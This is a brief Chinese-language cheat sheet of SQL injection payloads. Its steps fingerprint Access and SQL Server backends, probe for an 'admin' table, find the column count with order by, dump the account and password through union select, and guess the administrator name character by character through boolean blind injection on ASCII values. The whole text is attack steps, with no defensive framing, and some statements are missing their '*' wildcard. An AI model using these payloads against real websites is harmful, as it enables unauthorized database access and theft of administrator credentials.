and exists(select from msysobjects) >0 判断是否为access数据库
and exists(select from sysobjects) > 0 判断是否为sql server数据库
and exists(select from admin) 查看是否存在admin表 代表所有,可修改字段名
order by 数值 判断字段长度,正常则证明字段名长度在数值范围内,报错则超出范围
union select 1-正确数值 from 表名 联合查询,查询出两个数值
union select 上面第一个正确数值,第二个正确数值 from 表名 爆出账号密码
and(select len(admin)from admin) = 5 正常说明管理员账户长度为5 <>
and(select top 1 asc(mid(admin,1,1))from admin)>100 猜解管理员账号的第一个数据,通过判
断ascii码判断,返回正常则大于,反之则小于
mid(admin,2,1) 找第二列,依次类推